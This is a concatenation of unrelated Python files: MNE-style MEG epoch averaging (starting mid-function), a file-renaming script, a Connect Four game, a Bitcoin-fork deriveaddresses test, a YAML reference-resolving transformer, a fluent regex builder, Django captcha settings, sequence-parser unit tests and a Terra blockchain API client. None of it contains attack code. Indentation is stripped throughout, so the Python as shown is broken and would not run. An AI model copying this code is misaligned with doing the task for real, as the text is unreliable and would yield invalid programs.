% (ei + 1,))
reuse = True
epoch = epoch.copy() # because we operate inplace
if not reuse:
S = _trans_sss_basis(exp, all_coils, trans,
coil_scale=decomp_coil_scale)
# Get the weight from the un-regularized version (eq. 44)
weight = np.linalg.norm(S[:, :n_in])
# XXX Eventually we could do cross-talk and fine-cal here
S *= weight
S_decomp += S # eq. 41
epoch[slice(None) if weight_all else meg_picks] *= weight
data += epoch # eq. 42
w_sum += weight
count += 1
del info_from
mapping = None
if count == 0:
data.fill(np.nan)
else:
data[meg_picks] /= w_sum
data[other_picks] /= w_sum if weight_all else count
# Finalize weighted average decomp matrix
S_decomp /= w_sum
# Get recon matrix
# (We would need to include external here for regularization to work)
exp['ext_order'] = 0
S_recon = _trans_sss_basis(exp, all_coils_recon, recon_trans)
exp['ext_order'] = ext_order
# We could determine regularization on basis of destination basis
# matrix, restricted to good channels, as regularizing individual
# matrices within the loop above does not seem to work. But in
# testing this seemed to decrease localization quality in most cases,
# so we do not provide the option here.
S_recon /= coil_scale
# Invert
pS_ave = _col_norm_pinv(S_decomp)[0][:n_in]
pS_ave *= decomp_coil_scale.T
# Get mapping matrix
mapping = np.dot(S_recon, pS_ave)
# Apply mapping
data[meg_picks] = np.dot(mapping, data[meg_picks[good_mask]])
info_to['dev_head_t'] = recon_trans # set the reconstruction transform
evoked = epochs._evoked_from_epoch_data(data, info_to, picks,
n_events=count, kind='average',
comment=epochs._name)
_remove_meg_projs(evoked) # remove MEG projectors, they won't apply now
logger.info('Created Evoked dataset from %s epochs' % (count,))
return (evoked, mapping) if return_mapping else evoked
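# Usage sketch (assumes ``epochs`` come from a recording with cHPI and that
# ``head_pos`` holds head positions, e.g. from mne.chpi.read_head_pos):
#
#     evoked = average_movements(epochs, head_pos=head_pos)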
@verbose
def make_fixed_length_epochs(raw, duration=1., preload=False,
reject_by_annotation=True, proj=True, overlap=0.,
id=1, verbose=None):
"""Divide continuous raw data into equal-sized consecutive epochs.
Parameters
----------
raw : instance of Raw
Raw data to divide into segments.
duration : float
Duration of each epoch in seconds. Defaults to 1.
%(preload)s
%(reject_by_annotation_epochs)s
.. versionadded:: 0.21.0
%(proj_epochs)s
.. versionadded:: 0.22.0
overlap : float
The overlap between epochs, in seconds. Must be
``0 <= overlap < duration``. Default is 0, i.e., no overlap.
.. versionadded:: 0.23.0
id : int
The id to use (default 1).
.. versionadded:: 0.24.0
%(verbose)s
Returns
-------
epochs : instance of Epochs
Segmented data.
Notes
-----
.. versionadded:: 0.20
"""
events = make_fixed_length_events(raw, id=id, duration=duration,
overlap=overlap)
delta = 1. / raw.info['sfreq']
return Epochs(raw, events, event_id=[id], tmin=0, tmax=duration - delta,
baseline=None, preload=preload,
reject_by_annotation=reject_by_annotation, proj=proj,
verbose=verbose)
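# Usage sketch (assumes ``raw`` is a loaded Raw instance): cut the recording
# into 2-second segments with 1 second of overlap.
#
#     epochs = make_fixed_length_epochs(raw, duration=2., overlap=1.,
#                                       preload=True)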
|
import os
# Walk the current directory tree and rename data files whose names follow a
# "<class>-<weapon>-<description>" pattern, padding the class segment with a
# trailing '0' unless it already ends in '0' or '5'; Python source files are skipped.
for root, dirs, files in os.walk('.'):
for name in files:
if name.endswith('.py'):
continue
klass, weapon, desc = name.split('-')
if klass[-1] not in ('0', '5'):
new_klass = klass + '0'
else:
new_klass = klass
new_name = name.replace(klass, new_klass)
full_name = os.path.join(root, name)
print(full_name)
new_name = full_name.replace(name, new_name)
print(new_name)
os.rename(full_name, new_name)
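# Worked example (hypothetical file names) of the rename rule above:
#   "knight3-sword-rare.png" -> klass "knight3" does not end in '0'/'5' -> "knight30-sword-rare.png"
#   "knight5-bow-common.png" -> klass "knight5" already ends in '5'     -> renamed to itself (unchanged)
#   "helper.py"              -> skipped entirely (.py files are ignored)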
|
"""game.py - module for playing a game on the game board."""
from typing import Union
from connect_four.game_board import GameBoard
from connect_four.game_board import GamePiece
class Game:
"""Game - manage the playing of a Connect Four game."""
def __init__(self) -> None:
"""Initialize a new game."""
self.game_board = GameBoard()
self.player_one = GamePiece.RED
self.player_two = GamePiece.YELLOW
self.winner: Union[GamePiece, None] = None
def play(self) -> None:
"""Play a game that has been setup."""
row_idx = 0
active_player = self.player_one
self.game_board.display()
col_idx = int(input("Pick a column:"))
        row_idx = self.game_board.play(active_player, col_idx)
while not self.game_board.check_win(active_player, row_idx, col_idx):
if active_player == GamePiece.RED:
active_player = GamePiece.YELLOW
else:
active_player = GamePiece.RED
print("-" * 40)
self.game_board.display()
col_idx = int(input("Pick a column:"))
row_idx = self.game_board.play(active_player, col_idx)
self.winner = active_player
print("-" * 40)
self.game_board.display()
print(f"Congratulations, {self.winner}!")
def player_won(self, piece: GamePiece) -> bool:
"""Return true if the specified piece is the game winner."""
return self.winner == piece
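# Usage sketch (interactive; column indices are read from stdin):
#
#     if __name__ == "__main__":
#         game = Game()
#         game.play()
#         print("Red won:", game.player_won(GamePiece.RED))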
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the deriveaddresses rpc call."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.descriptors import descsum_create
from test_framework.util import assert_equal, assert_raises_rpc_error
class DeriveaddressesTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.supports_cli = 1
def run_test(self):
assert_raises_rpc_error(-5, "Invalid descriptor", self.nodes[0].deriveaddresses, "a")
descriptor = "wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)#t6wfjs64"
address = "rsir1qjqmxmkpmxt80xz4y3746zgt0q3u3ferr0c8362"
assert_equal(self.nodes[0].deriveaddresses(descriptor), [address])
descriptor = descriptor[:-9]
assert_raises_rpc_error(-5, "Invalid descriptor", self.nodes[0].deriveaddresses, descriptor)
descriptor_pubkey = "wpkh(tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/0)#s9ga3alw"
address = "rsir1qjqmxmkpmxt80xz4y3746zgt0q3u3ferr0c8362"
assert_equal(self.nodes[0].deriveaddresses(descriptor_pubkey), [address])
ranged_descriptor = "wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)#kft60nuy"
assert_equal(self.nodes[0].deriveaddresses(ranged_descriptor, [1, 2]), ["rsir1qhku5rq7jz8ulufe2y6fkcpnlvpsta7rqtc0r66", "rsir1qpgptk2gvshyl0s9lqshsmx932l9ccsv2ye3927"])
assert_equal(self.nodes[0].deriveaddresses(ranged_descriptor, 2), [address, "rsir1qhku5rq7jz8ulufe2y6fkcpnlvpsta7rqtc0r66", "rsir1qpgptk2gvshyl0s9lqshsmx932l9ccsv2ye3927"])
assert_raises_rpc_error(-8, "Range should not be specified for an un-ranged descriptor", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)"), [0, 2])
assert_raises_rpc_error(-8, "Range must be specified for a ranged descriptor", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"))
assert_raises_rpc_error(-8, "End of range is too high", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), 10000000000)
assert_raises_rpc_error(-8, "Range is too large", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [1000000000, 2000000000])
assert_raises_rpc_error(-8, "Range specified as [begin,end] must not have begin after end", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [2, 0])
assert_raises_rpc_error(-8, "Range should be greater or equal than 0", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [-1, 0])
combo_descriptor = descsum_create("combo(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)")
assert_equal(self.nodes[0].deriveaddresses(combo_descriptor), ["mtfUoUax9L4tzXARpw1oTGxWyoogp52KhJ", "mtfUoUax9L4tzXARpw1oTGxWyoogp52KhJ", address, "QhH14HY4FwMbpAN3SRRJKixiC8PdFg8qpP"])
hardened_without_privkey_descriptor = descsum_create("wpkh(tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1'/1/0)")
assert_raises_rpc_error(-5, "Cannot derive script without private keys", self.nodes[0].deriveaddresses, hardened_without_privkey_descriptor)
bare_multisig_descriptor = descsum_create("multi(1,tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/0,tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/1)")
assert_raises_rpc_error(-5, "Descriptor does not have a corresponding address", self.nodes[0].deriveaddresses, bare_multisig_descriptor)
if __name__ == '__main__':
DeriveaddressesTest().main()
|
#!/usr/bin/env python3
import urllib.request
import yaml
import sys
# This program takes a path to a YAML file as its argument. It scans the file for
# particular tags and, upon finding them, replaces them with content from other YAML files at the referenced locations.
#This function accepts a file path to a yaml file and returns the contents of the yaml file as a dictionary
def input_from_yaml(inputfile):
try:
with open(inputfile) as file:
yaml_template = yaml.load(file, Loader=yaml.FullLoader)
return yaml_template
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
#This function accepts a url for a yaml file, and returns the contents of the yaml file in a python dictionary
def get_yaml_from_url(yaml_url):
try:
with urllib.request.urlopen(yaml_url) as urlfile:
yaml_resource_file = yaml.load(urlfile, Loader=yaml.FullLoader)
return yaml_resource_file
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
#This function accepts a python dictionary and outputs a yaml file to stdout.
def output_to_yaml():
try:
yaml.safe_dump(outputyaml, sys.stdout, allow_unicode=True, default_flow_style=False, sort_keys=False)
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
# This function takes a nested dictionary and recursively traverses it looking for replacement tags. It substitutes those tags with content from the referenced files and returns a new dictionary.
def create_new_yaml(nested_dict):
emptydict = {}
for key, value in nested_dict.items():
keystring = str(key)
        if not keystring.startswith('X-replace'):
if type(value) != dict:
emptydict[key] = value
if type(value) == dict:
recursivevalue = create_new_yaml(value)
if recursivevalue != "schema replaced" and recursivevalue !="enum replaced":
emptydict[key] = recursivevalue
if recursivevalue == "schema replaced":
emptydict[key]=storagedict
if recursivevalue =="enum replaced":
emptydict['enum'] = secondstorage.get('enum')
if keystring.startswith('X-replace'):
if keystring == 'X-replace-enum-list':
yaml_url=str(value.get('enum-file-ref'))
                if not yaml_url.startswith('http'):
yaml_obj = input_from_yaml(yaml_url)
if yaml_url.startswith('http'):
yaml_obj = get_yaml_from_url(yaml_url)
replaced_section = []
for enumkey, enumvalue in yaml_obj.items():
replaced_section.append(enumkey)
secondstorage['enum'] = replaced_section
return "enum replaced"
if keystring == 'X-replace-schema':
yaml_url_list=(value.get('schema-file-ref'))
for schemakey, schemavalue in emptydict.items():
storagedict[schemakey] = schemavalue
for thisurl in yaml_url_list:
yaml_url = str(thisurl)
                    if not yaml_url.startswith('http'):
yaml_obj = input_from_yaml(yaml_url)
if yaml_url.startswith('http'):
yaml_obj = get_yaml_from_url(yaml_url)
internalcall = create_new_yaml(yaml_obj)
for tempkey, tempvalue in internalcall.items():
storagedict[tempkey] = tempvalue
return "schema replaced"
return emptydict
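# Illustrative input fragment (hypothetical file names) showing the two tags
# create_new_yaml understands. A mapping containing 'X-replace-enum-list' is
# replaced by an 'enum' list built from the top-level keys of the referenced
# file, while an 'X-replace-schema' entry is replaced by the (recursively
# processed) contents of every file listed under 'schema-file-ref':
#
#   status:
#     X-replace-enum-list:
#       enum-file-ref: status_values.yaml
#   properties:
#     X-replace-schema:
#       schema-file-ref:
#         - https://example.com/common_schema.yaml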
# Running this python file as a script
# python3 -m general_schema_template_transformer <input_file>
if __name__ == "__main__":
#Makes sure that there is at least one argument being passed to this program. If there is, the argument is assigned to a variable. input_from_yaml is then called with this variable as a parameter.
try:
input_file = sys.argv[1]
except IndexError as e:
msg = "Must pass in exactly 1 argument: the name of an existing file"
sys.exit(msg)
yaml_template = input_from_yaml(input_file)
storagedict = {} #Instantiates a global dictionary. This provides temporary storage of dictionary elements to be used with create_new_yaml function
secondstorage = {} #Instantiates a second global dictionary. This is only used for collecting enum lists to use at earlier loops through the recursive function
outputyaml = create_new_yaml(yaml_template)
output_to_yaml()
|
import re
import copy
from typing import Union, Optional, List
from .exceptions import BadStatement
from .aux_classes import Stack, StackFrame
### Grouping
from .regex_classes import SetOfLiterals
from .regex_classes import Capture, Group
### Quantifiers
from .regex_classes import OptionalQ
from .regex_classes import zeroOrMore, zeroOrMoreLazy
from .regex_classes import oneOrMore, oneOrMoreLazy
from .regex_classes import Between, betweenLazy
from .regex_classes import atLeast, upTo
from .regex_classes import Exactly
### Others
from .regex_classes import Root
### Literals
from .regex_classes import anyChar, whitespaceChar
from .regex_classes import nonWhitespaceChar, Digit
from .regex_classes import nonDigit, Word, nonWord
from .regex_classes import Char, rawChar, String, rawString
from .regex_classes import Newline, carriageReturn, Tab, Space
from .regex_classes import Range, anythingButRange
from .regex_classes import anyOfChars, anythingButChars
class ExpressiveRegex:
    __slots__ = ('_expression', '_hasDefineStart', '_hasDefineEnd', '_flags', '_stack', '_mutable')
def __init__(self, mutable=False):
self._expression = ""
self._hasDefineStart = False
self._hasDefineEnd = False
self._flags = {
# TODO: add the other flags
'i': False, # case-insensitive matching
'm': False, # multiline
}
self._stack = Stack()
self._stack.push(StackFrame(Root))
self._mutable = mutable
@property
def mutable(self):
return self._mutable
@property
def _currentFrame(self): # pragma: no cover
return self._stack.top()
    def _applyQuantifier(self, element): # pragma: no cover
if self._currentFrame.quantifier:
wrap = self._currentFrame.get_qinstance(element)
self._currentFrame.quantifier = None
self._currentFrame._quantifier_args = ()
self._currentFrame._quantifier_kwargs = {}
else:
wrap = element
return wrap
def _matchElement(self, cls, *args, **kwargs): # pragma: no cover
element = cls(*args, **kwargs)
        wrap = self._applyQuantifier(element)
self._currentFrame.elements.append(wrap)
return self
def _instance(self): # pragma: no cover
if self._mutable:
return self
obj = copy.deepcopy(self)
obj._expression = ""
return obj
def _quantifier(self, qclass, *args, **kwargs):
if self._currentFrame.quantifier is not None:
raise BadStatement(f'cannot quantify regular expression with "{str(qclass)}" because it\'s already being quantified with "{self._currentFrame.quantifier}"')
if self._currentFrame.type is SetOfLiterals:
            raise BadStatement('Quantifiers aren\'t admitted inside "setOfLiterals".')
instance = self._instance()
instance._currentFrame.quantifier = qclass
instance._currentFrame._quantifier_args = args
instance._currentFrame._quantifier_kwargs = kwargs
return instance
def _group(self, gclass):
instance = self._instance()
newFrame = StackFrame(gclass)
instance._stack.push(newFrame)
return instance
### Quantifiers
@property
def optional(self):
return self._quantifier(OptionalQ)
@property
def zeroOrMore(self):
return self._quantifier(zeroOrMore)
@property
def zeroOrMoreLazy(self):
return self._quantifier(zeroOrMoreLazy)
@property
def oneOrMore(self):
return self._quantifier(oneOrMore)
@property
def oneOrMoreLazy(self):
return self._quantifier(oneOrMoreLazy)
def exactly(self, a: int):
return self._quantifier(Exactly, a)
def between(self, a: int, b: int):
return self._quantifier(Between, a, b)
def betweenLazy(self, a: int, b: int):
return self._quantifier(betweenLazy, a, b)
def atLeast(self, a: int):
return self._quantifier(atLeast, a)
def upTo(self, b: int):
return self._quantifier(upTo, b)
### Grouping
def end(self):
if len(self._stack) == 1:
raise BadStatement("Cannot call end while building the root expression.")
instance = self._instance()
frame = instance._stack.pop()
        wrap = instance._applyQuantifier(frame.get_instance())
        instance._currentFrame.elements.append(wrap)
return instance
@property
def setOfLiterals(self):
return self._group(SetOfLiterals)
@property
def capture(self):
return self._group(Capture)
@property
def group(self):
return self._group(Group)
### Literals
@property
def anyChar(self):
instance = self._instance()
return instance._matchElement(anyChar)
@property
def whitespaceChar(self):
instance = self._instance()
return instance._matchElement(whitespaceChar)
@property
def nonWhitespaceChar(self):
instance = self._instance()
return instance._matchElement(nonWhitespaceChar)
@property
def digit(self):
instance = self._instance()
return instance._matchElement(Digit)
@property
def nonDigit(self):
instance = self._instance()
return instance._matchElement(nonDigit)
@property
def word(self):
instance = self._instance()
return instance._matchElement(Word)
@property
def nonWord(self):
instance = self._instance()
return instance._matchElement(nonWord)
@property
def newline(self):
instance = self._instance()
return instance._matchElement(Newline)
@property
def carriageReturn(self):
instance = self._instance()
return instance._matchElement(carriageReturn)
@property
def tab(self):
instance = self._instance()
return instance._matchElement(Tab)
@property
def space(self):
instance = self._instance()
return instance._matchElement(Space)
def char(self, value):
instance = self._instance()
return instance._matchElement(Char, value)
def rawChar(self, value):
instance = self._instance()
return instance._matchElement(rawChar, value)
def string(self, value):
instance = self._instance()
return instance._matchElement(String, value)
def rawString(self, value):
instance = self._instance()
return instance._matchElement(rawString, value)
def range(self, begin: Union[str, int], end: Union[str, int],
exclude: Optional[Union[List[Union[str, int]], str]]=None):
instance = self._instance()
return instance._matchElement(Range, begin, end, exclude)
def anythingButRange(self, begin: Union[str, int], end: Union[str, int],
exclude: Optional[Union[List[Union[str, int]], str]]=None):
instance = self._instance()
return instance._matchElement(anythingButRange, begin, end, exclude)
def anyOfChars(self, value):
instance = self._instance()
return instance._matchElement(anyOfChars, value)
def anythingButChars(self, value):
instance = self._instance()
return instance._matchElement(anythingButChars, value)
### Build Expression
    def toRegexString(self) -> str:
txt = 'Cannot compute the value of a not yet fully specified regex object.\n'
txt += f'(Try adding a .end() call to match the "{str(self._currentFrame.type)}")\n'
assert len(self._stack) == 1, txt
if not self._mutable and self._expression:
return self._expression
exp = self._currentFrame.get_instance().value
self._expression = exp
return exp
def toRegex(self):
exp = self.toRegexString()
return re.compile(exp)
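# Usage sketch (assumes the classes in regex_classes emit the constructs their
# names suggest): quantifiers are stated *before* the element they modify, and
# every group opened with .capture/.group/.setOfLiterals is closed with .end().
#
#     exp = (ExpressiveRegex()
#            .capture
#                .oneOrMore.digit
#            .end()
#            .char('-')
#            .exactly(4).digit)
#     pattern = exp.toRegex()        # compiled re.Pattern built from the chain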
|
from rest_framework.settings import APISettings
from django.conf import settings
import os
USER_SETTINGS = getattr(settings, 'REST_CAPTCHA', None)
FONT_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fonts/Vera.ttf')
DEFAULTS = {
'CAPTCHA_CACHE': 'default',
    'CAPTCHA_TIMEOUT': 300,  # 5 minutes
'CAPTCHA_CACHE_KEY': 'rest_captcha_{key}.{version}',
'CAPTCHA_KEY': 'captcha_key',
'CAPTCHA_IMAGE': 'captcha_image',
'CAPTCHA_LENGTH': 4,
'CAPTCHA_FONT_PATH': FONT_PATH,
'CAPTCHA_FONT_SIZE': 22,
'CAPTCHA_IMAGE_SIZE': (90, 40),
'CAPTCHA_LETTER_ROTATION': (-35, 35),
'CAPTCHA_FOREGROUND_COLOR': '#001100',
'CAPTCHA_BACKGROUND_COLOR': '#ffffff',
'FILTER_FUNCTION': 'rest_captcha.captcha.filter_default',
'NOISE_FUNCTION': 'rest_captcha.captcha.noise_default',
    # for test access: MASTER_CAPTCHA = {'secret_key': 'secret_value'}
'MASTER_CAPTCHA': {}
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = ('FILTER_FUNCTION', 'NOISE_FUNCTION')
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
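# Usage sketch (hypothetical values): any of the DEFAULTS above can be
# overridden from the Django project's settings module, e.g.
#
#     # settings.py
#     REST_CAPTCHA = {
#         'CAPTCHA_LENGTH': 6,
#         'CAPTCHA_IMAGE_SIZE': (120, 50),
#         'CAPTCHA_TIMEOUT': 600,
#     }
#
# and are then read elsewhere as attributes, e.g. api_settings.CAPTCHA_LENGTH.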
|
# write tests for parsers
from seqparser import (
FastaParser,
FastqParser)
def test_freebie_parser_1():
"""
This one is a freebie
DO NOT MODIFY THIS FUNCTION
"""
assert True
def test_freebie_parser_2():
"""
This too is a freebie
DO NOT MODIFY THIS FUNCTION
"""
assert 1 != 2
def test_FastaParser():
"""
Write your unit test for your FastaParser
class here. You should generate an instance of
your FastaParser class and assert that it properly
reads in the example Fasta File.
"""
head0 = '>seq0' #define headers and sequences for the first and last two sequences in test.fa
seq0 = 'TGATTGAATCTTTTGAGGGTCACGGCCCGGAAGCCAGAATTTCGGGGTCCTCTGTGGATATTAATCGAGCCCACACGGTGTGAGTTCAGCGGCCCCCGCA'
head1 = '>seq1'
seq1 = 'TCCGCCCGCTGTGCTGACGAGACTAGCAGGGAAATAAATAGAGGGTTTAGTTATACTCAGTAGGCAGTTCGATGGCTTATATCTAACTTCTTATTCCGAT'
head98 = '>seq98'
seq98 = 'CGAGCGAGAAACGCGCTAACTAGCAACCGGAACAACAATGCTGGGTTGAATTTGATTCGCACCCGACGATCACTAGAGAGTTTATCTGGGACTCCGGGAC'
head99 = '>seq99'
seq99 = 'CAAACCGGCGATGCGGGTACTCCCTACAAGTTGGACTCCGCAGCGAACGCCGCAGGGGCCATTATACGGCGGTCTTGGCGGCGTCGACCAGGCCGGTCCA'
fasta = '../project1/data/test.fa'
out = FastaParser(fasta)
out_list = [tup for tup in out] #convert output into a list of tuples
assert out_list[0] == (head0,seq0) #check that the headers and sequences are equivalent
assert out_list[1] == (head1,seq1)
assert out_list[98] == (head98,seq98)
assert out_list[99] == (head99,seq99)
def test_FastqParser():
"""
Write your unit test for your FastqParser
class here. You should generate an instance of
your FastqParser class and assert that it properly
reads in the example Fastq File.
"""
head0 = '@seq0' #define headers and sequences for the first and last two sequences in test.fq
seq0 = 'TGTGGTCGTATAGTTATTGTCATAAATTACACAGAATCGCGATTCTCCGCGTCCACCAATCTTAGTGCACCACAGCATCGACCCGATTTATGACGCTGAG'
qual0 = '''*540($=*,=.062565,2>'487')!:&&6=,6,*7>:&132&83*8(58&59>'8!;28<94,0*;*.94**:9+7"94(>7='(!5"2/!%"4#32='''
head1 = '@seq1'
seq1 = 'CCCCGGACGACTGATCCCGATAGAGCTCACTCTTCGAGGCAAGCAGACCCATATCGTCCTGCTGGCAACGCTATCCGGGTGCGAGTAAATCGAAACCTCG'
qual1 = ''''(<#/0$5&!$+,:=%7=50--1;'(-7;0>=$(05*9,,:%0!<),%646<8#%"."-'*-0:.+*&$5!'8)(%3*+9/&/%=363*,6$20($97,"'''
head98 = '@seq98'
seq98 = 'AACCTGCCCGTAGCCTTTAGGTAGCCCGTCTACATGTCCTCCAGTACAGTGGAAGCTCCTACATCAACTGATCAAATAACATCGCAGCACTATATGTCAC'
qual98 = '''39$$8'':7:0;0%/7$89-<3',:)1"0'=2'!#5><>+6/=99#>8-$76(6$2'+=;$-))753#99,=+4+1=:5.08*$*:4=,>)/)':8,<48'''
head99 = '@seq99'
seq99 = 'CCGAGTTTTGTAGTGGGCTCAACTGAAATCCTATTCTTAGACGATTGGTCATAAAACCCTTTCACTGTACGGACGTAGACCCTGCTCCGTCTTCCAGCAG'
qual99 = '''2$7)*5:"=+++!:.=>!5>79)8!566$!3*/4$=4.%=//;900$9)!%)4%$=0":02"0=!0#/>+*1$1$39!.8+9<'1$*1$321&<'&9,)2'''
fastq = '../project1/data/test.fq'
out = FastqParser(fastq)
out_list = [tup for tup in out] #convert output into a list of tuples
assert out_list[0] == (head0,seq0,qual0) #check that the headers, sequences, and qualities are equivalent
assert out_list[1] == (head1,seq1,qual1)
assert out_list[98] == (head98,seq98,qual98)
assert out_list[99] == (head99,seq99,qual99)
|
"""Terra Money FCD model"""
__docformat__ = "numpy"
import logging
import textwrap
from datetime import datetime
from typing import Any, Tuple, Dict
import pandas as pd
import requests
from gamestonk_terminal.cryptocurrency.dataframe_helpers import (
denominate_number,
prettify_column_names,
replace_unicode,
)
from gamestonk_terminal.decorators import log_start_end
logger = logging.getLogger(__name__)
GOV_COLUMNS = [
"submitTime",
"id",
"depositEndTime",
"status",
"type",
"title",
"Yes",
"No",
]
GOV_STATUSES = ["voting", "deposit", "passed", "rejected", "all"]
VALIDATORS_COLUMNS = [
"validatorName",
"tokensAmount",
"votingPower",
"commissionRate",
"status",
"uptime",
]
@log_start_end(log=logger)
def _make_request(endpoint: str) -> dict:
"""Helper method handles terra fcd api requests. [Source: https://fcd.terra.dev/v1]
Parameters
----------
endpoint: str
endpoint url
Returns
-------
dict:
dictionary with response data
"""
url = f"https://fcd.terra.dev/v1/{endpoint}"
response = requests.get(
url, headers={"Accept": "application/json", "User-Agent": "GST"}
)
if not 200 <= response.status_code < 300:
raise Exception(f"fcd terra api exception: {response.text}")
try:
return response.json()
except Exception as e:
raise ValueError(f"Invalid Response: {response.text}") from e
@log_start_end(log=logger)
def _adjust_delegation_info(delegation: dict) -> dict:
"""Helper method which removes redundant fields from delegation info dictionary,
and denominate value fields. [Source: https://fcd.terra.dev/v1]
Parameters
----------
delegation:
dictionary object with delegation data e.g.
Returns
-------
dict
adjusted dictionary with delegation data
"""
delegation_info = {}
for key, value in delegation.items():
if key in ["amountDelegated", "totalReward"]:
delegation_info[key] = denominate_number(value)
elif key in ["validatorAddress", "rewards"]:
continue
else:
delegation_info[key] = value
return delegation_info
@log_start_end(log=logger)
def get_staking_account_info(address: str = "") -> Tuple[pd.DataFrame, str]:
"""Get staking info for provided terra account [Source: https://fcd.terra.dev/swagger]
Parameters
----------
address: str
terra blockchain address e.g. terra1jvwelvs7rdk6j3mqdztq5tya99w8lxk6l9hcqg
Returns
-------
Tuple[pd.DataFrame, str]:
luna delegations and summary report for given address
"""
response = _make_request(f"staking/{address}")
results: Dict[str, Any] = {"myDelegations": []}
for field in ["availableLuna", "delegationTotal"]:
results[field] = denominate_number(response.get(field, 0))
my_delegations = response.get("myDelegations")
if my_delegations:
for delegation in my_delegations:
validator = _adjust_delegation_info(delegation)
results["myDelegations"].append(validator)
df = pd.DataFrame(results["myDelegations"])
try:
df["validatorName"] = df["validatorName"].apply(lambda x: replace_unicode(x))
df.columns = prettify_column_names(list(df.columns))
except KeyError:
df = pd.DataFrame()
results["totalRewards"] = denominate_number(
response.get("rewards", {}).get("total", 0)
)
report = f"""Overview:
Address: {address}
Available Luna: {results['availableLuna']}
Delegated Luna: {results['delegationTotal']}
Total Rewards: {results['totalRewards']}\n"""
report += "\nDelegations: " if not df.empty else "\nNo delegations found\n"
return df, report
@log_start_end(log=logger)
def get_validators() -> pd.DataFrame:
"""Get information about terra validators [Source: https://fcd.terra.dev/swagger]
Returns
-------
pd.DataFrame
terra validators details
"""
response = _make_request("staking")["validators"]
results = []
for validator in response:
results.append(
{
"accountAddress": validator["accountAddress"],
"validatorName": validator["description"].get("moniker"),
"tokensAmount": denominate_number(validator["tokens"]),
"votingPower": round(
(float(validator["votingPower"].get("weight")) * 100), 2
),
"commissionRate": round(
(float(validator["commissionInfo"].get("rate", 0)) * 100), 2
),
"status": validator["status"],
"uptime": round((float(validator.get("upTime", 0)) * 100), 2),
}
)
return pd.DataFrame(results).sort_values(by="votingPower")
@log_start_end(log=logger)
def get_proposals(status: str = "") -> pd.DataFrame:
"""Get terra blockchain governance proposals list [Source: https://fcd.terra.dev/swagger]
Parameters
----------
status: str
status of proposal, one from list: ['Voting','Deposit','Passed','Rejected']
Returns
-------
pd.DataFrame
Terra blockchain governance proposals list
"""
statuses = ["Voting", "Deposit", "Passed", "Rejected"]
response = _make_request("gov/proposals")["proposals"]
results = []
votes_options = ["Yes", "Abstain", "No", "NoWithVeto"]
for proposal in response:
deposit = proposal.pop("deposit")
proposal["depositEndTime"] = deposit.get("depositEndTime")
vote = proposal.pop("vote")
proposal.pop("proposer")
for opt in votes_options:
proposal[opt] = vote["count"].get(opt)
results.append(proposal)
columns = [
"id",
"submitTime",
"depositEndTime",
"status",
"type",
"title",
"Yes",
"No",
"Abstain",
"NoWithVeto",
]
df = pd.DataFrame(results)[columns]
